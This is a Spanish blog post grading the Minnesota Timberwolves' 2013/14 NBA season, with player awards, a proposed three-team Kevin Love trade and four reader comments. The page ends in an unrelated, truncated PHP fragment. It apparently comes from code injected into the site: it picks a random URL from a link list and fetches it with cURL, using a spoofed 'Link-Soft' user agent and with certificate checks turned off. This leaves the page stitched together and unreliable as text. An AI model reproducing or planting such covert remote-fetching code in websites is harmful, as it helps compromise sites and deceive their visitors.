Minnesota Timberwolves: Insuficiente

02 de July de 2014 por Ruxixon

La calificación de la temporada de los Timberwolves resume muy bien lo que ha sido no sólo esta campaña sinó un ciclo de 3 años que empezó un 26 de diciembre de 2011 cuando, cual regalo de Navidad que llegaba después del lockout, apareció un equipo destinado a partes iguales, a robar el corazón de los aficionados gracias a un baloncesto muy divertido, y a alcanzar cotas muy altas. Sin embargo, 3 años después aquí estamos, contemplando como los números de un sempiterno candidato al MVP, Kevin Love, han caído en saco roto. O viendo como la magia de Ricky “Business”, como lo llamaba Andrés Montes, se ha ido haciendo más débil perdida entre su progresión y la falta de ella.  O podemos decir que quizás el trabajo de Adelman en los banquillos debería haber finalizado algo antes, recuperando así algo de ese tiempo perdido con su familia. Al final el proyecto ha resultado insuficiente entre una mezcla de mala fortuna, representada en forma de lesiones, y malas decisiones, como esa de plantarle a Kevin Love un contrato de 3 + 1 con una Player Option el último año, lo que te deja este verano en la encrucijada que supone ver a tu jugador franquicia decidido a irse a otro lugar a conseguir lo que en la fría Minnesota no ha podido. La sequía de los lobos sin visitar los PO dura ya 10 años, la peor racha de entre todas las franquicias de la NBA en la actualidad, y el panorama no es alentador. 


Pedíamos
un poco de suerte para los Timberwolves con las lesiones para esta temporada 13/14 y en cierto punto la han tenido. De los importantes quien más partidos se ha perdido ha sido Nikola Pekovic, que sólo ha jugado 54 partidos (por 77 de Love y 82 de Ricky), si bien dicha ausencia ha tenido el premio de descubrir a Gorgui Dieng como un jugador con el que contar, así que en parte esa lesión queda compensada y no puede ser utilizada como excusa. Los Timberwolves han sido este año un equipo muy flojo defensivamente y esa es su rémora. Corey Brewer, que venía de Denvr con la etiqueta de buen defensor para ocupar el hueco de Kirilenko, ha dado un paso atrás,  y un supuesto especialista como Luc Mbah a Moute, llegado como la solución a todos los males tras el traspaso de Derrick Williams a Sacramento, ha sido desbordado ante tanta vía de agua en el equipo y ni siquiera se hizo un hueco en el quinteto. Podían haber intenado paliar ese déficit defensivo colectivamente pero tampoco han sido capaces. El mejor ejemplo es que todo lo que te da en ataque una pintura de tanta calidad como la que formaban Love y Pekovic, luego te lo quita en defensa, y esto se hace extensivo a toda la plantilla. Su otro agujero negro ha sido su inconsistencia para ganar partidos apretados, cosechando un pobre 6-14 en partidos resueltos en una diferencia de 5 o menos puntos.

Por último, comentar algo sobre el resto de la plantilla. Habitualmente se le da bastante cera a Kevin Martin (indolencia, poco trabajo defensivo…) pero los Timberwolves sabían lo que fichaban cuando lo firmaron. Creo que ha hecho una buena temporada y ha cumplido con lo esperado al convertirse en el 2º máximo anotador del equipo, con 19 puntos por partido. JJ Barea es otro de los que no sorprenden. Perfil contrapuesto a Ricky, va agotando su tiempo como 6º hombre de la franquicia. Ha estado en sus números teniendo en cuenta que ha jugado algo menos. Si acaso más preocupante es el caso de Chase Budinger, con 64 partidos en las 2 últimas temporadas y lejos de mejorar sus defectos entre tanto tiempo parado en la enfermería. Dante Cunningham ha sido la primera rotación de la dupla interior y ha hecho un trabajo bastante apañado, pero sigue abusando del tiro de 6 metros. Anecdóticamente diremos que el que en su día fue proyectado como una especie de Kobe Bryant, Shabazz Muhammad, sólo ha jugado 290 minutos, aunque en algún partido que otro ha dejado muestras de lo que puede ser si le dan confianza.

PREMIOS

MVP: Un año más Kevin Love ha promediado números de MVP de la competición pero el balance de Minnesota le deja fuera de cualquier opción de ganar este premio. Eso sí, con 26.1 puntos y 12.5 rebotes de media nadie le discute haber sido el mejor jugador de su equipo.

Rookie y Sorpresa: Condenado a los minutos de la basura cuando jugaba, Gorgui Dieng ha sido de las pocas noticias positivas del equipo. Con Pekovic y Turiaf KO, Dieng promedió un doble-doble durante los 15 partidos que partió como titular y dejó un par de actuaciones de 22-21 y 12-20 que hacen pensar que este jugador tiene un hueco importante en el futuro de la franquicia.

Decepción: Posiblemente sea injusta la mención de Rick Adelman teniendo en cuenta que la familia está por encima de todo, pero si hay que ceñirse sólo al ámbito deportivo, este año no ha sabido motivar a sus jugadores y muchas veces se ha obcecado con el reparto de minutos, infrautilizando a jugadores como Mbah a Moute o Shved y desterrando por completo a los rookies, salvo causa de fuerza mayor. Una pequeña mancha en un currículum brillante, al menos en lo que se refiere al estilo de juego implantado en sus equipos.

Esfuerzo en vano: El mayor esfuerzo en vano es para la franquicia en su conjunto durante este periodo de 3 años. Se nos hacía la boca agua ver esos highlights protagonizados principalmente por Ricky Rubio en los que conectaba con sus compañeros a través de pases que te dejaban con la boca abierta y que eran el mejor ejemplo de a qué se jugaba en ese equipo. Una pena que al final una propuesta así no haya obtenido siquiera el premio de haber jugado unos PO.

JUGANDO A GM

Las fotos en Boston, con ese “posado” con Rondo, supusieron el punto de partida al affaire Love, con el que debemos lidiar esta preseason. No sería aconsejable llegar a la apertura del campeonato con Love en el equipo, ya que parece altamente improbable que el jugador esté dispuesto a renovar. Está situación desembocaría seguramente en una falta de química con el resto del equipo, por lo que habría una atmósfera enrarecida que no generaría nada positivo. Así que ya está, ha llegado el día en que nuestro jugador franquicia sea traspasado. En mi caso ya lo hubiera hecho antes del draft, aceptando alguna oferta cuya base fuera un combo de picks más algún jugador joven pero la idea de Saunders es otra. Hablando de draft, incorporamos a Zach Lavine y a Glenn Robinson III.

En un traspaso a 3 bandas entre Golden State, Detroit y nosotros podríamos llegar al siguiente acuerdo.

Minnesota

Da: Kevin Love, Kevin Martin y Budinger.
Recibe: Klay Thompson, Josh Smith, Chauncey Billups y Jerebko.

Golden State

Da: Klay Thompson y David Lee.
Recibe: Kevin Love y Kevin Martin.

Detroit

Da: Josh Smith, Chauncey Billups y Jerebko.
Recibe: David Lee y Budinger.

El valor de Josh Smith en estos momentos es muy bajo teniendo en cuenta rendimiento y contrato. Creo que ahorrarse 1 años en los libros (diferencia en la duración del contrato entre Lee y Smith) y que coincida justo en la renovación de Drummond puede interesarles. Además David Lee es más fiable  desde media distancia, y con el nuevo sistema que quiere implantar Van Gundy creo que encaja mejor. No hay que olvidar que su interés en Lee será inversamente proporcional a las posibilidades de quedarse con Greg Monroe pero será uno de los peces al que más echen la caña y no es difícil imaginarse un escenario sin Monroe (ya sea porque no igualen o porque deciden un Sign&Trade).

Si bien a Detroit le puede llegar a “estorbar” Josh Smith, a nosotros nos viene como un guante para elevar nuestro rendimiento defensivo en la pintura bajo la premisa de que en todo momento será nuestro PF, nada de jugar en las alas. Además lo de siempre, un jugador con esas condiciones atléticas puede verse favorecido por el juego de Ricky Rubio. Klay Thompson te abre la cancha y además también cumple el perfil de ser un buen defensor, faceta en la que ha ido mejorando con el paso de los años. En este equipo puede ser el máximo anotador, con unos 20 puntos de media, y es el principal motivo para realizar el traspaso por Love. Jerebko es una apuesta que si sale mal no pasa nada, es expiring. Abre la cancha desde el puesto de 4. Por último Billups volvería al que en su día fuera su equipo, con la promesa de ocupar un lugar en nuestras oficinas en cuanto se retire (siempre ha dicho que prefiere un lugar en los despachos antes que en los banquillos), algo que sería más complicado en Detroit con la llegada de Van Gundy cogiendo todas las responsabilidades. Como añadido siempre puede desempeñar el  rol de guía para los rookies.

Alexey Shved sobra claramente y es expiring, puede tener salida sencilla. Sería romántico contar con los servicios del jugador más icónico de esta franquicia pero dudo mucho que Garnett quiera volver, y bueno, sería imposible de cuadrar un traspaso. Hay que irse a por opciones menores como Nick Collison, que aquí igual rasca más minutos que en Oklahoma.

La plantilla quedaría:

PG: Ricky Rubio, Barea, Billups.
SG: Klay Thompson, Brewer, Lavine.
SF: Mbah a Moute, Shabazz Muhammad, Glenn Robinson III.
PF: Josh Smith, Nick Collison, Jerebko.
C: Pekovic, Dieng, Turiaf.

Equipo con 4 jugadores muy claros en el 5 inicial. Contemplo seriamente la opción de Mbah a Moute como titular en el SF, no asumiría tiros en un equipo con 3 jugadores referentes como Klay, Josh y Pekovic, nos da un punto más en ese empeño en mejorar el juego defensivo del equipo y equilibra las rotaciones, situando a Brewer en la segunda unidad. Habría que ir dándole mucha más bola a Dieng, analizando si realmente puede jugar en las 2 posiciones interiores, aumentar los minutos a Muhammad y a Lavine le daría minutos residuales de base/escolta, y si va superando las expectativas a medida que crece su tiempo de juego le pondría como primer suplente del español y de Klay. Hay mucho expiring que será de ayuda para renovar a Ricky y a Klay. Lo necesitaremos habiendo seguido este plan.

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    no termine de leer el análisis pero el GM que haya ofrecido un contrato de 3 años y uno con opción de jugador, lo deberían echar ya, hoy mismo

      Citar

  2. Jose Luis dice:
    #2

    Ese fue el contrato que firmó en su dia, sí :S

      Citar

  3. Ruxixon dice:
    #3

    De hecho creo recordar que preferían esa renovación por 4 años de Love,dejando libre la de 5 para Ricky Rubio.

      Citar

  4. r_miller dice:
    #4

    Si esta gente no empieza a defender no entraran en playoffs, porque en los finales de partido cuando las defensas se endurecen no son capaces de anotar y ellos muchas veces no son capaces de frenar a la estrella rival. Kevin Martin, si sigue deveria de salir de sexto hombre y encontrar un jugador con mas capacidad para defender, porque este tipo es un coladero.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>